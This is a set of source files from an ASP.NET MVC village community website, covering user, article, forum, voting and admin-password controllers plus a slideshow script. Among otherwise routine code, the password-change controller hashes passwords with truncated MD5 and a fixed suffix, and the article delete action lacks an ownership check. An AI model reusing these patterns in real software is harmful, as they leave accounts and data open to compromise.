\"n\", info = \"数据库中没有该用户\" });\n }\n v.Enabled = !v.Enabled;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"操作成功\" });\n }\n\n #endregion\n\n //↑村民管理\n\n\n /// <summary>\n /// 游客列表\n /// </summary>\n /// <param name=\"pageindex\"></param>\n /// <returns></returns>\n public new ActionResult User(int pageindex = 1)\n {\n int pagesize = 10;\n int 
total = 0;//总数\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.User.Count();\n List<Model.User> list0 = dal.User.OrderBy(a => a.ID).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.User>();\n PagedList<GDKQ.Model.User> list = new PagedList<Model.User>(list0, pageindex, pagesize, total);\n ViewBag.Title = \"游客管理\";\n return View(list);\n }\n\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Forbidden1(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.User v = dal.User.SingleOrDefault(x => x.ID == id);\n if (v == null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该用户\" });\n }\n v.Enabled = !v.Enabled;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"操作成功\" });\n }\n\n }\n}" }, { "alpha_fraction": 0.5270863771438599, "alphanum_fraction": 0.5270863771438599, "avg_line_length": 26.360000610351562, "blob_id": "63672013ba667c7db9f72f1818348775b68bcd1d", "content_id": "7db5679177b0d8bf8b61dcb52df2264bb7c54999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 685, "license_type": "no_license", "max_line_length": 90, "num_lines": 25, "path": "/GDKQ.Web/Areas/Livelihood/LivelihoodAreaRegistration.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System.Web.Mvc;\n\nnamespace GDKQ.Web.Areas.Livelihood\n{\n public class LivelihoodAreaRegistration : AreaRegistration \n {\n public override string AreaName \n {\n get \n {\n return \"Livelihood\";\n }\n }\n\n public override void RegisterArea(AreaRegistrationContext context) \n {\n context.MapRoute(\n \"Livelihood_default\",\n \"Livelihood/{controller}/{action}/{id}\",\n new { controller = \"Home\", action = \"Index\", id = UrlParameter.Optional },\n new string[] { \"GDKQ.Web.Areas.Livelihood.Controllers\" }\n );\n }\n }\n}" }, { "alpha_fraction": 0.5796002745628357, "alphanum_fraction": 0.6113025546073914, "avg_line_length": 25.870370864868164, "blob_id": "40f816fa45bff296e74817e289079146358c3b13", "content_id": "f5dd6d0ed68648b2b308bef5c352a6087df86967", "detected_licenses": [ "MIT", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1503, "license_type": "permissive", "max_line_length": 137, "num_lines": 54, "path": "/GDKQ.Web/Content/Livelihood/js/affair.js", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "// JavaScript Document\n\nwindow.onload = function(){\n setInterval(function() {\n runtime();\n },2800);\n\n var list = document.getElementsByClassName(\"outside\");\n list[0].style.backgroundColor=\"#63b2f5\";\n\n}\n\n\n\nfunction listclicks(n){\n var list = document.getElementsByClassName(\"outside\");\n for (var i = 0 ; i <list.length;i++){\n list[i].style.backgroundColor=\"#f5f5f5\";\n console.log(list[i]);\n }\n console.log(n);\n console.log(list[n]);\n list[n].style.backgroundColor=\"#63b2f5\";\n}\n\n\nvar i = 0;\nvar arr = [\"/Content/Livelihood/images/af_img1.png\", \"/Content/Livelihood/images/af_img2.png\", \"/Content/Livelihood/images/af_img3.png\"];\nvar arrp = [\"修葺一心斋\", \"恭贺我村入选第二批中国传统村落名录\", \"巩固旧屋\"];\nfunction runtime() {\n var p = document.getElementById(\"p1\");\n var img1 = document.getElementById(\"af_img\");\n if (i == 3) {\n i = 0;\n }\n p.innerHTML=arrp[i];\n img1.src = arr[i];\n i = i+1;\n}\n\n\nfunction clicks(){\n var img2 = document.getElementById(\"af_img\").src;\n var imgs = img2.substring(img2.lastIndexOf(\"/\")+1);\n if (imgs===\"1.jpg\"){\n 
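// NOTE: the slideshow sources above are af_img1.png ~ af_img3.png, so these .jpg comparisons appear stale and may never match\n        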
window.location.href=\"http://news.tzc.edu.cn/index.php/campus-updates/3180.html\"\n }\n if (imgs===\"2.jpg\"){\n window.location.href=\"http://news.tzc.edu.cn/index.php/campus-updates/3658.html\"\n }\n if (imgs===\"3.jpg\"){\n window.location.href=\"http://news.tzc.edu.cn/index.php/campus-updates/3312.html\"\n }\n}\n" }, { "alpha_fraction": 0.5318934917449951, "alphanum_fraction": 0.5354093313217163, "avg_line_length": 33.94736862182617, "blob_id": "806a1082c72071deb080e37db2b8a7ce91a211d0", "content_id": "fbae6a6cc21dd5e4f1e8e2611c9e59b648a7bd68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2071, "license_type": "no_license", "max_line_length": 179, "num_lines": 57, "path": "/GDKQ.Web/Areas/User/Controllers/ArticleController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.User.Controllers\n{\n [Filter.UserLoginFilter]\n public class ArticleController : Controller\n {\n /// <summary>\n /// \n /// </summary>\n /// <param name=\"pageindex\">当前第几页</param>\n /// <returns></returns>\n public ActionResult List(int pageindex=1)\n {\n int pagesize = 10;//每页显示条数\n int total = 0;//总数\n Model.User u = Session[\"user\"] as Model.User;\n if (u == null)\n {\n return Content(\"重新登录\");\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n if (ui==null)\n {\n return Content(\"找不到该用户的资料\");\n }\n total = dal.Article.Count(a => a.AuthorID==u.ID && a.IsDeleted == true && a.Enable == true);\n List<Model.Article> list0 = dal.Article.Where(\n a => a.AuthorID ==u.ID ).OrderBy(a => a.AuthorID==u.ID&&a.IsDeleted==true&&a.Enable==true).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Article>();\n PagedList<GDKQ.Model.Article> list =new PagedList<Model.Article>(list0, pageindex, pagesize,total);\n ViewBag.username = ui.Nickname;\n return View(list);\n }\n\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult Delect(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article art = dal.Article.SingleOrDefault(x => x.ID == id);\n if (art==null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该文章\" });\n }\n art.IsDeleted = false;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"删除成功\" });\n }\n }\n}" }, { "alpha_fraction": 0.4751593768596649, "alphanum_fraction": 0.4793696701526642, "avg_line_length": 32.9346923828125, "blob_id": "154f465edd2cc1f8ce6870c67b9f56c6d8072549", "content_id": "418e4ead00459b1973a8f518d9d6df42b479a91c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 8735, "license_type": "no_license", "max_line_length": 178, "num_lines": 245, "path": "/GDKQ.Web/Areas/BBS/Controllers/NewsController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using Lucene.Net.Analysis;\nusing Lucene.Net.Analysis.Standard;\nusing System;\nusing System.Collections.Generic;\nusing System.IO;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\nusing Common;\n\nnamespace GDKQ.Web.Areas.BBS.Controllers\n{\n public class NewsController : Controller\n {\n /// <summary>\n /// 常见问题(list)\n /// </summary>\n /// <returns></returns>\n public ActionResult ListQ()\n {\n return View();\n 
}\n\n\n\n        /// <summary>\n        /// 精华文章bh=04 按照点赞数排序\n        /// 最新文章bh=01 按时间\n        /// 活动提倡bh=02 按时间\n        /// 其它精彩bh=03 按时间\n        /// </summary>\n        /// <returns></returns>\n        public ActionResult List(string bh, int pageindex = 1)\n        {\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.UA_Category ca = dal.UA_Category.SingleOrDefault(x => x.bh == bh);\n            if (ca == null)\n            {\n                return Content(\"请选择正确的分类\");\n            }\n            int pagesize = 10;//每页显示条数\n            int total = 0;//总数\n            total = dal.Article.Count(x => x.CategoryID == ca.bh && x.IsDeleted == true);\n            if (total < 1)\n            {\n                return Content(\"暂无相关文章\");\n            }\n            List<Model.Article> list0;\n            if (bh==\"04\")\n            {\n                list0 = dal.Article.Where(x => x.CategoryID == ca.bh && x.IsDeleted == true).OrderByDescending(x=>x.like_count).ThenByDescending(x=>x.CreateTime).Skip(\n                    (pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Article>();\n            }\n            else\n            {\n                list0 = dal.Article.Where(x => x.CategoryID == ca.bh && x.IsDeleted == true).OrderByDescending(x=>x.CreateTime).ThenBy(a => a.ID).Skip(\n                    (pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Article>();\n            }\n            PagedList<GDKQ.Model.Article> list = new PagedList<Model.Article>(list0, pageindex, pagesize, total);\n            foreach (var item in list)\n            {\n                item.Body = HtmlFilter.ReplaceHtmlTag(item.Body); \n            }\n            ViewBag.Title = ca.CaName;\n            ViewBag.bh = ca.bh;\n            return View(list);\n        }\n\n\n\n\n        /// <summary>\n        /// 用户发帖\n        /// </summary>\n        /// <returns></returns>\n        public ActionResult Add()\n        {\n            return View();\n        }\n\n\n        [ValidateAntiForgeryToken()]\n        [HttpPost]\n        public ActionResult Add(string bh, string Label, string Title, string Body)\n        {\n            if (Session[\"user\"] == null)\n            {\n                return Json(new { status = \"n\", info = \"亲,记得先登录哦~\", NextUrl = \"/Login\" });\n            }\n            Model.User u = Session[\"user\"] as Model.User;\n            if (string.IsNullOrEmpty(bh) || string.IsNullOrEmpty(Label) || string.IsNullOrEmpty(Title) || string.IsNullOrEmpty(Body))\n            {\n                return Json(new { status = \"n\", info = \"请填写完整的信息\", NextUrl = \"/BBS/News/Add\" });\n            }\n\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.UA_Category uac = dal.UA_Category.SingleOrDefault(x => x.bh == bh);\n            if (uac == null)\n            {\n                return Json(new { status = \"n\", info = \"没有该分类,请重新选择\", NextUrl = \"/BBS/News/Add\" });\n            }\n            dal.Article.Add(new Model.Article()\n            {\n                AuthorID = u.ID,\n                AuthorName = u.UserName,\n                Body = Body,\n                Title = Title,\n                CaName = uac.CaName,\n                CategoryID = uac.bh,\n                Comments = 0,\n                CreateTime = DateTime.Now,\n                IsDeleted = true,\n                lab = Label + Title,\n                like_count = 0,\n                ModTime = DateTime.Now,\n                VisitNum = 0,\n                Enable = false,\n                Photo = null\n            });\n\n            dal.SaveChanges();\n\n            return Json(new { status = \"y\", info = \"发布成功,请等待管理员审核\", NextUrl = \"/BBS/Home\" });\n        }\n\n        /// <summary>\n        /// 文章模型 文章&评论\n        /// </summary>\n        public class viewModel\n        {\n            public Model.Article Art { get; set; }//文章\n            public List<Model.Comment> Comment { get; set; }//评论\n\n            public viewModel(Model.Article _Art, List<Model.Comment> _Comment)\n            {\n                this.Art = _Art;\n                this.Comment = _Comment;\n            }\n        }\n        /// <summary>\n        /// 文章单页\n        /// </summary>\n        /// <param name=\"id\"></param>\n        /// <returns></returns>\n        public ActionResult OnePage(int id)\n        {\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.Article art = dal.Article.SingleOrDefault(x => x.ID == id);\n            if (art == null)\n            {\n                return Content(\"数据库中没有该文章\");\n            }\n            List<Model.Comment> com = dal.Comment.Where(x => x.ArtcleID == art.ID).ToList<Model.Comment>();\n            viewModel vm = new viewModel(art, com);\n            ViewBag.Title = art.CaName;\n            ViewBag.CategoryID =
art.CategoryID;\n return View(vm);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken()]\n public ActionResult AddComments(string body, int? id)\n {\n if (!id.HasValue)\n {\n return Json(new { status = \"n\", info = \"该文章不存在\" });\n }\n if (string.IsNullOrEmpty(body))\n {\n return Json(new { status = \"n\", info = \"评论不能为空\" });\n }\n if (Session == null)\n {\n return Json(new { status = \"n1\", info = \"只有登录后才能评论哦,请先登录吧\" });\n }\n Model.User u = Session[\"user\"] as Model.User;\n\n if (u == null)\n {\n return Json(new { status = \"n1\", info = \"只有登录后才能评论哦,请先登录吧\" });\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.UserInfo ui = dal.UserInfo.SingleOrDefault(x => x.UserID == u.ID);\n dal.Comment.Add(new Model.Comment()\n {\n Body = body,\n ArtcleID = id.Value,\n UserID = u.ID,\n UserName = u.UserName,\n Photo = ui.Photo,\n CreateTime = DateTime.Now\n });\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"评论成功\" });\n }\n\n\n\n public ActionResult ReturnResult()\n {\n return View();\n }\n [HttpPost]\n public ActionResult ReturnResult(string keywords,int pageindex = 1)\n {\n int total = 0;\n int pagesize = 5;\n if (string.IsNullOrEmpty(keywords))\n {\n return Json(new { status = \"n\", info = \"搜索关键字不能为空哦~\", NextUrl = \"/BBS/Home\" });\n }\n DAL.GDKQContext dal = new DAL.GDKQContext();\n total = dal.Article.Count(x => x.lab.IndexOf(keywords) > -1 && x.IsDeleted == true && x.Enable == true);\n if (total < 1)\n {\n return Json(new { status = \"n\", info = \"暂无相关的文章~\", NextUrl = \"/BBS/Home\" });\n }\n List<Model.Article> list0 = dal.Article.Where(x => x.lab.IndexOf(keywords) > -1 && x.IsDeleted == true && x.Enable == true).OrderByDescending(a => a.CreateTime).Skip(\n (pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Article>();\n PagedList<GDKQ.Model.Article> list = new PagedList<Model.Article>(list0, pageindex, pagesize, total);\n ViewBag.Title = \"搜索结果\";\n\n return View(\"ReturnResult\",list);\n }\n\n /// <summary>\n /// 点赞\n /// </summary>\n /// <param name=\"id\"></param>\n /// <returns></returns>\n public ActionResult AddLikeCount(int id)\n {\n DAL.GDKQContext dal = new DAL.GDKQContext();\n Model.Article art = dal.Article.SingleOrDefault(x => x.ID == id);\n if (art==null)\n {\n return Json(new { status = \"n\", info = \"数据库中没有该文章\" });\n }\n art.like_count++;\n dal.SaveChanges();\n return Json(new { status = \"y\", info = \"点赞成功\" });\n }\n }\n}" }, { "alpha_fraction": 0.46216681599617004, "alphanum_fraction": 0.5008598566055298, "avg_line_length": 35.637794494628906, "blob_id": "a0dbe56d83509a79278110afc66ced72bbbe79e4", "content_id": "071a2593ee9fac4597f5bbc24a8984c7da2fcf75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 4916, "license_type": "no_license", "max_line_length": 330, "num_lines": 127, "path": "/GDKQ.Web/Areas/Adm1n/Controllers/VoteController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Globalization;\nusing System.Linq;\nusing System.Text.RegularExpressions;\nusing System.Web;\nusing System.Web.Mvc;\nusing Webdiyer.WebControls.Mvc;\n\nnamespace GDKQ.Web.Areas.Adm1n.Controllers\n{\n [Filter.AdminLoginFilter]\n public class VoteController : Controller\n {\n /// <summary>\n /// 投票分页\n /// </summary>\n /// <param name=\"bh\"></param>\n /// <param name=\"pageindex\"></param>\n /// <returns></returns>\n public ActionResult List( int pageindex = 1)\n {\n int pagesize = 10;//每页显示条数\n int 
total = 0;//总数\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            List<Model.Vote_Main> lvm = dal.Vote_Main.Where(x => x.IsDeleted == true).OrderByDescending(\n                x=>x.CreateTime).Skip((pageindex - 1) * pagesize).Take(pagesize).ToList<Model.Vote_Main>();\n            total = dal.Vote_Main.Count(n=> n.IsDeleted == true);\n            if (total < 1)\n            {\n                return Content(\"数据库中没有相关投票\");\n            }\n            PagedList<GDKQ.Model.Vote_Main> list = new PagedList<Model.Vote_Main>(lvm, pageindex, pagesize, total);\n            ViewBag.Title = \"投票管理\";\n            return View(list);\n        }\n\n        public ActionResult Add()\n        {\n            return View();\n        }\n\n        [HttpPost]\n        [ValidateInput(false)]\n        [ValidateAntiForgeryToken()]\n        public ActionResult Add(string title,string body,string endtime)\n        {\n            if (string.IsNullOrEmpty(title) || string.IsNullOrEmpty(body) || string.IsNullOrEmpty(endtime) )\n            {\n                return Json(new { status = \"n\", info = \"请填写完整的信息\" });\n            }\n            if (!IsDate(endtime))\n            {\n                return Json(new { status = \"n\", info = \"请输入正确的日期格式1\" });\n            }\n            endtime += \" 00:00:00\";\n            DateTime dt = Convert.ToDateTime(endtime);\n            if (dt==null)\n            {\n                return Json(new { status = \"n\", info = \"请输入正确的日期格式2\" });\n            }\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            if (dal.Vote_Main.Count(x=>x.Enabled==true)>0)\n            {\n                return Json(new { status = \"n\", info = \"同一时间只能发起一个投票,请确认是否有投票仍在进行\" });\n            }\n            dal.Vote_Main.Add(new Model.Vote_Main()\n            {\n                Title = title,\n                Body = body,\n                CreateTime = DateTime.Now,\n                EndTime = dt,\n                Enabled=true,\n                IsDeleted=true\n            });\n            dal.SaveChanges();\n            return Json(new { status = \"y\", info = \"添加成功\" });\n        }\n\n\n        public ActionResult VoteResult(int id)\n        {\n            if (id<1)\n            {\n                return Json(new { status=\"n\",info = \"数据库中没有该投票\" });\n            }\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.Vote_Main vm = dal.Vote_Main.SingleOrDefault(x => x.ID == id);\n            if (vm==null)\n            {\n                return Json(new { status = \"n\", info = \"数据库中没有该投票\" });\n            }\n            double total = dal.Vote_Result.Count(x => x.VoteID == id);\n            double choice = dal.Vote_Result.Count(x => x.VoteID == id && x.Agree == true);\n            ViewBag.Percent = (choice / total).ToString(\"P\");\n            return View(vm);\n        }\n\n        /// <summary>\n        /// 是否为日期型字符串\n        /// </summary>\n        /// <param name=\"StrSource\">日期字符串(2008-05-08)</param>\n        /// <returns></returns>\n        public static bool IsDate(string StrSource)\n        {\n            return Regex.IsMatch(StrSource, @\"^((((1[6-9]|[2-9]\\d)\\d{2})-(0?[13578]|1[02])-(0?[1-9]|[12]\\d|3[01]))|(((1[6-9]|[2-9]\\d)\\d{2})-(0?[13456789]|1[012])-(0?[1-9]|[12]\\d|30))|(((1[6-9]|[2-9]\\d)\\d{2})-0?2-(0?[1-9]|1\\d|2[0-9]))|(((1[6-9]|[2-9]\\d)(0[48]|[2468][048]|[13579][26])|((16|[2468][048]|[3579][26])00))-0?2-29))$\");\n        }\n\n\n        //public class viewModel{\n        //    public List<Model.News> news001 { get; set; }//公示公告\n        //    public List<Model.News> news002 { get; set; }//建设农村\n        //    public List<Model.News> news003 { get; set; }//村内事务\n        //    public List<Model.News> news007 { get; set; }//时事要点\n\n        //    public viewModel(List<Model.News> newsList001, List<Model.News> newsList002, List<Model.News> newsList003, List<Model.News> newsList007)\n        //    {\n        //        this.news001 = newsList001;\n        //        this.news002 = newsList002;\n        //        this.news003 = newsList003;\n        //        this.news007 = newsList007;\n\n        //    }\n\n        //}\n    }\n}" }, { "alpha_fraction": 0.5087719559669495, "alphanum_fraction": 0.5142543911933899, "avg_line_length": 29.93220329284668, "blob_id": "ab9f98f5f803b050eadfa41c1821766ba36d9f51", "content_id": "14c583e6462e417fe4eeb9ba416cfc47bef8c167", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1964,
"license_type": "no_license", "max_line_length": 123, "num_lines": 59, "path": "/GDKQ.Web/Areas/Adm1n/Controllers/PwdModController.cs", "repo_name": "JasonLuoBetter/BeautifulCountryside", "src_encoding": "UTF-8", "text": "using Common;\nusing System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Web;\nusing System.Web.Mvc;\n\nnamespace GDKQ.Web.Areas.Adm1n.Controllers\n{\n    [Filter.AdminLoginFilter]\n    public class PwdModController : Controller\n    {\n        //修改密码\n        public ActionResult Index()\n        {\n            return View();\n        }\n\n\n        [ValidateAntiForgeryToken()]\n        [HttpPost]\n        public ActionResult Index(string password,string password1,string password2)\n        {\n            if (string.IsNullOrEmpty(password) || string.IsNullOrEmpty(password1) || string.IsNullOrEmpty(password2))//密码校验\n            {\n                return Json(new { status = \"n\", info = \"请填写完整的修改信息\" });\n            }\n            if (password1!=password2)\n            {\n                return Json(new { status = \"n\", info = \"两次输入的新密码不同,请重新输入\" });\n            }\n            if (password==password1)\n            {\n                return Json(new { status = \"n\", info = \"新密码不能与旧密码相同\" });\n            }\n\n            Model.Admin a = Session[\"admin\"] as Model.Admin;\n            password += \"_GDKQ\";\n            password = MD5.MD5Encrypt16(password);\n            if (a.Password.ToLower()!=password.ToLower())\n            {\n                return Json(new { status = \"n\", info = \"原密码错误,请重新输入\" });\n            }\n\n            DAL.GDKQContext dal = new DAL.GDKQContext();\n            Model.Admin aa = dal.Admin.SingleOrDefault(x=>x.ID==a.ID);\n            if (aa==null)\n            {\n                return Json(new { status = \"n\", info = \"数据库没有该管理员\" });\n            }\n            password1 += \"_GDKQ\";\n            password1 = MD5.MD5Encrypt16(password1);\n            aa.Password = password1;\n            dal.SaveChanges();\n            return Json(new { status = \"y\", info = \"修改成功\", NextUrl = \"/Login\" });\n        }\n    }\n}" } ]
40
NapsterInBlue/kneejerk_example
https://github.com/NapsterInBlue/kneejerk_example
9337d80f349962c4f925a5e0b6e663031563441b
79c5ed6627109f70c39a063ee2784bd303af4acf
eeab910370d11fb6d92f0010bd2d57f88980765a
refs/heads/master
2020-05-20T15:22:22.229937
2019-05-08T19:18:32
2019-05-08T19:18:32
185,642,730
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6306620240211487, "alphanum_fraction": 0.6689895391464233, "avg_line_length": 24, "blob_id": "796a24712dc508ff0b982d8c53c075bcfa6a5c0b", "content_id": "10659d0510149f68b888d91efdf379da8c997937", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 574, "license_type": "no_license", "max_line_length": 62, "num_lines": 23, "path": "/loader.py", "repo_name": "NapsterInBlue/kneejerk_example", "src_encoding": "UTF-8", "text": "from keras.preprocessing.image import ImageDataGenerator\n\n\nTRAIN_DIR = 'example/train'\nTEST_DIR = 'example/test'\nVAL_DIR = 'example/val'\n\ntrain_datagen = ImageDataGenerator(rescale=1./255)\nvalidation_datagen = ImageDataGenerator(rescale=1./255)\n\ntrain_generator = train_datagen.flow_from_directory(\n TRAIN_DIR,\n target_size=(200, 200),\n batch_size=2,\n class_mode='binary'\n )\n\nvalidation_generator = validation_datagen.flow_from_directory(\n VAL_DIR,\n target_size=(200, 200),\n batch_size=2,\n class_mode='binary'\n )" }, { "alpha_fraction": 0.7762237787246704, "alphanum_fraction": 0.7867133021354675, "avg_line_length": 30.77777862548828, "blob_id": "8a889d6442bbc967a2d018cbd1c4f3fbae2a12d5", "content_id": "c73e3115ee05693999aec1a88bc382d0191dd461", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 286, "license_type": "no_license", "max_line_length": 74, "num_lines": 9, "path": "/README.md", "repo_name": "NapsterInBlue/kneejerk_example", "src_encoding": "UTF-8", "text": "An example dataset to accompany the tutorial in the kneejerk docs, located\n[here](https://napsterinblue.github.io/kneejerk/tutorial.html)\n\n\n## To Follow Along\n\n1. Clone this repository to your local workstation\n2. Activate a virtual environment\n3. Run `pip install -r requirements.txt`\n" } ]
2
Ash-Hassan/QR-Code-Generate-Decode
https://github.com/Ash-Hassan/QR-Code-Generate-Decode
9554e24d4d8ba8e8d4f99414f4a451a8a76391f2
7e2b77a706c62c429b2b82782c980193c87950f6
d586b5b54186a2be172b177611b84c6b5faab4b6
refs/heads/main
2023-04-10T15:35:22.008524
2021-04-23T22:22:58
2021-04-23T22:22:58
361,018,372
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5672645568847656, "alphanum_fraction": 0.5874439477920532, "avg_line_length": 20, "blob_id": "60e2c6b5ad4389dc574d25cdda8f10c9fe43a253", "content_id": "5d8beae2f3c7e0adf856d8786fec436fede5a33a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 446, "license_type": "no_license", "max_line_length": 41, "num_lines": 20, "path": "/Read_QRCode.py", "repo_name": "Ash-Hassan/QR-Code-Generate-Decode", "src_encoding": "UTF-8", "text": "import cv2\r\nimport numpy as np\r\nimport pyzbar.pyzbar as pyzbar\r\n\r\n# Scan From VideoCamera\r\ncap = cv2.VideoCapture(0)\r\nwhile True:\r\n _, frame = cap.read()\r\n decodedObjects = pyzbar.decode(frame)\r\n for obj in decodedObjects:\r\n x = obj.data\r\n print('QRCode Data: ', obj.data)\r\n\r\n if len(decodedObjects) != 0:\r\n break\r\n\r\n cv2.imshow(\"Frame\", frame)\r\n key = cv2.waitKey(1)\r\n if key==27:\r\n break\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.7815126180648804, "alphanum_fraction": 0.7815126180648804, "avg_line_length": 58.5, "blob_id": "27bb9f1c9c024587756b410a768403ba1a44cfa6", "content_id": "271d7f38718b36d5de5f724a32ee3450bb2383eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 119, "license_type": "no_license", "max_line_length": 92, "num_lines": 2, "path": "/README.md", "repo_name": "Ash-Hassan/QR-Code-Generate-Decode", "src_encoding": "UTF-8", "text": "# QR-Code-Generate-Decode\nThis repository contains a project by which one can create the QR code or decode a QR code.\n" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 22, "blob_id": "a20a019b4e43343dcee9a8372369b0222908cc4b", "content_id": "41c4b7ee338360675a9c02537c26f64879f6806c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 43, "num_lines": 8, "path": "/QRCode_Generator.py", "repo_name": "Ash-Hassan/QR-Code-Generate-Decode", "src_encoding": "UTF-8", "text": "import pyqrcode as df\r\nimport png\r\n\r\ninpp = 'Msg Inside QR Code'\r\na = df.create(inpp)\r\nnam = input('Enter Name Of File To Save: ')\r\na.png(nam+'.png')\r\nprint('QR Code Generated Successfully')" } ]
3
ronyjacobson/to-get-there-server
https://github.com/ronyjacobson/to-get-there-server
934c88db6e3e311688542ab20920158035a66251
b93f124ea4dbafbbac495c5d4c961e96dc2402e5
16268874d2924e6202e22613e896f7b3fb00d0e2
refs/heads/master
2021-01-13T14:20:35.204924
2015-07-21T10:06:22
2015-07-21T10:06:22
39,396,871
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6038781404495239, "alphanum_fraction": 0.6038781404495239, "avg_line_length": 22.322580337524414, "blob_id": "85a5a58110ccf70a73b7f459e1143a29d38eb74b", "content_id": "298d51f9df976e105c8655bbb88894562bd6e759", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 722, "license_type": "no_license", "max_line_length": 80, "num_lines": 31, "path": "/togetthereApp/forms.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "from django import forms\nfrom django.forms import ModelForm\nfrom .models import *\n\nclass UserForm(ModelForm):\n class Meta:\n model = User\n fields = ['facebook_id', 'first_name', 'last_name','email', 'birthday']\n\n\n\nclass SPForm(ModelForm):\n class Meta:\n model = SP\n fields = ['name', 'desc', 'category', 'longitude',\n 'latitude', 'phone', 'discount', 'website']\n\n\nclass AddressForm(ModelForm):\n class Meta:\n model = Address\n fields = ['street_num', 'street', 'city']\n\n\n#class EditSPForm(ModelForm):\n#class RankSPForm(ModelForm):\n\nclass AddReviewForm(ModelForm):\n class Meta:\n model = Review\n fields = ['title', 'content', 'user']" }, { "alpha_fraction": 0.6080798506736755, "alphanum_fraction": 0.6135522127151489, "avg_line_length": 31.025774002075195, "blob_id": "18f3c9b5d461cbd608864387c9008ead1dfa03af", "content_id": "de87962ff68f5c0977e41ec1f571e91a9cdc83aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6213, "license_type": "no_license", "max_line_length": 105, "num_lines": 194, "path": "/togetthereApp/models.py", "repo_name": "ronyjacobson/to-get-there-server", "src_encoding": "UTF-8", "text": "from django.db import models\nimport datetime\n\n# Change your models (in models.py).\n# Run python manage.py makemigrations <App Name> to create migrations for those changes\n# Run python manage.py migrate to apply those changes to the database.\n\n\n\nclass User(models.Model):\n facebook_id = models.CharField(max_length=30, blank = True)\n first_name = models.CharField(max_length=35, db_index=True)\n last_name = models.CharField(max_length=35, db_index=True, blank = True)\n email = models.EmailField(db_index=True, blank = True)\n birthday = models.DateField(blank = True)\n created = models.DateTimeField(auto_now_add=True)\n\n # bday = datetime.datetime(year, month, day)\n # user = User(facebook_id = '', first_name= '', last_name= '', email = '', birthday=bday)\n\n def age(self):\n return (datetime.datetime.now().date() - self.birthday).days / 365\n\n def __unicode__(self):\n return self.first_name +\" \"+ self.last_name\n\n def as_json(self):\n return dict(\n id = self.pk,\n facebook_id = self.facebook_id,\n first_name = self.first_name,\n last_name = self.last_name,\n full_name = self.first_name +\" \"+ self.last_name,\n email = self.email,\n age = self.age(),\n birthday = self.birthday.isoformat(),\n created = self.created.isoformat())\n\n\n\nclass City(models.Model):\n city_name = models.CharField(max_length=50, db_index=True, unique=True)\n\n def __unicode__(self):\n return self.city_name\n\n def as_json(self):\n return dict(\n id = self.pk,\n city_name = self.city_name)\n\n\n\nclass Street(models.Model):\n city = models.ForeignKey(City)\n street_name = models.CharField(max_length=50, db_index=True)\n\n class Meta:\n unique_together = ((\"city\", \"street_name\"),)\n\n def __unicode__(self):\n return self.street_name\n\n def as_json(self):\n \n return dict(\n id = 